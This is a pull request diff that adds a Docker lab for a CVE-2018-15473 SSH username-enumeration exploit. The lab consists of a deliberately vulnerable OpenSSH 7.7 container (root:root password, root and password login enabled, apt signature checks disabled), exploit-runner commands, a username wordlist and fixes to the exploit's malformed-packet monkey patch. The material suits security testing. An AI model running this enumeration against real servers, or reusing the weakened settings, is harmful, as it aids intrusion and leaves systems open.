### PR TITLE
Update Docker setup and requirements for CVE testing

### DIFF
--- a/Dockerfile-cve-2018-15473
+++ b/Dockerfile-cve-2018-15473
@@ -1,0 +1,22 @@
+# Use the official Python image from the Docker Hub
+FROM python:3.9
+
+# Install system dependencies
+RUN apt-get update && apt-get install -y libffi-dev gcc
+
+# Set the working directory in the container
+WORKDIR /app
+
+# Copy the requirements file into the container at /app
+COPY requirements.txt .
+COPY users.txt .
+
+# Install the dependencies
+RUN pip install --no-cache-dir -r requirements.txt
+
+# Copy the script into the container at /app
+COPY ssh-username-enum.py .
+
+# Run the script when the container launches
+CMD ["python", "ssh-username-enum.py"]
+

--- a/Dockerfile-openssh
+++ b/Dockerfile-openssh
@@ -1,0 +1,43 @@
+# Use Debian Jessie as the base image
+FROM debian:jessie
+
+# Disable GPG signature checking and update repositories to archived versions
+RUN echo 'Acquire::Check-Valid-Until "false";' >> /etc/apt/apt.conf.d/10no-check-valid-until && \
+    echo 'Acquire::AllowInsecureRepositories "true";' >> /etc/apt/apt.conf.d/10allow-insecure && \
+    sed -i 's/http:\/\/deb.debian.org\/debian/http:\/\/archive.debian.org\/debian/g' /etc/apt/sources.list && \
+    sed -i 's/http:\/\/security.debian.org\/debian-security/http:\/\/archive.debian.org\/debian-security/g' /etc/apt/sources.list && \
+    sed -i '/jessie-updates/d' /etc/apt/sources.list
+
+# Update packages and install necessary dependencies
+RUN apt-get update && \
+    apt-get install -y --force-yes wget build-essential zlib1g-dev libssl-dev libpam0g-dev openssh-client
+
+# Download and compile OpenSSH version 7.7
+RUN wget https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-7.7p1.tar.gz && \
+    tar xzf openssh-7.7p1.tar.gz && \
+    cd openssh-7.7p1 && \
+    ./configure --with-md5-passwords --with-privsep-path=/var/lib/sshd && \
+    make && make install
+
+# Create a user and group for SSHD privilege separation
+RUN groupadd sshd && \
+    useradd -g sshd -c 'sshd privsep' -d /var/lib/sshd -s /bin/false sshd
+
+# Create the user 'cyberaguiar'
+RUN useradd -m cyberaguiar
+
+# Generate a random password and set it for the user 'cyberaguiar'
+RUN echo "cyberaguiar:$(tr -dc A-Za-z0-9 </dev/urandom | head -c 16 ; echo '')" | chpasswd
+
+# Configure sshd
+RUN mkdir /var/run/sshd
+RUN echo 'root:root' | chpasswd
+RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /usr/local/etc/sshd_config
+RUN sed -i 's/#PasswordAuthentication yes/PasswordAuthentication yes/' /usr/local/etc/sshd_config
+
+# Expose the SSH port
+EXPOSE 22
+
+# Execute sshd
+CMD ["/usr/local/sbin/sshd", "-D", "-e", "-f", "/usr/local/etc/sshd_config"]
+

--- a/README.md
+++ b/README.md
@@ -18,6 +18,20 @@ pipenv install -r requirements.txt  # if you're cool like that
 chmod u+x ssh-username-enum.py
 ```
 
+Docker Setup
+---
+Build Docker images
+```bash
+docker build -t vulnerable-openssh -f Dockerfile-openssh .
+docker build -t cve-2018-15473 -f Dockerfile-cve-2018-15473 .
+```
+
+Run Docker containers
+```bash
+docker run -d --name vulnerable-openssh vulnerable-openssh
+docker run -it --rm --link vulnerable-openssh:vulnerable-openssh cve-2018-15473 python ssh-username-enum.py -v -w users.txt -p 22 vulnerable-openssh
+```
+
 Examples
 ---
 A single username 

--- a/requirements.txt
+++ b/requirements.txt
@@ -1,6 +1,6 @@
 asn1crypto==0.24.0
 bcrypt==3.1.4
-cffi==1.11.5
+cffi==1.14.6
 cryptography==2.3.1
 idna==2.7
 paramiko==2.4.1

--- a/ssh-username-enum.py
+++ b/ssh-username-enum.py
@@ -82,7 +82,7 @@ def apply_monkey_patch() -> None:
         """ Override correct behavior of paramiko.message.Message.add_boolean, used to produce malformed packets. """
 
     auth_handler = paramiko.auth_handler.AuthHandler
-    old_msg_service_accept = auth_handler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
+    old_msg_service_accept = auth_handler._handler_table.get(paramiko.common.MSG_SERVICE_ACCEPT)
 
     def patched_msg_service_accept(*args, **kwargs):
         """ Patches paramiko.message.Message.add_boolean to produce a malformed packet. """
@@ -95,7 +95,7 @@ def apply_monkey_patch() -> None:
         """ Called during authentication when a username is not found. """
         raise InvalidUsername(*args, **kwargs)
 
-    auth_handler._client_handler_table.update({
+    auth_handler._handler_table.update({
         paramiko.common.MSG_SERVICE_ACCEPT: patched_msg_service_accept,
         paramiko.common.MSG_USERAUTH_FAILURE: patched_userauth_failure
     })

--- a/users.txt
+++ b/users.txt
@@ -1,0 +1,11 @@
+root
+cyberaguiar
+info
+admin
+2000
+michael
+NULL
+john
+david
+robert
+chris


### PR DESCRIPTION
Description:
This pull request updates the repository with the necessary Dockerfiles, Docker setup instructions in the README, and updates the requirements to include the latest version of the cffi library. Here's a summary of the changes:

Added new Dockerfiles and a user list for CVE testing.
Updated Docker setup instructions in the README file to include building Docker images and running Docker containers.
Updated the cffi library to version 1.14.6 in the requirements file.
Refactored handler table references in the SSH monkey patch.
These changes aim to improve the usability and completeness of the repository for CVE testing purposes.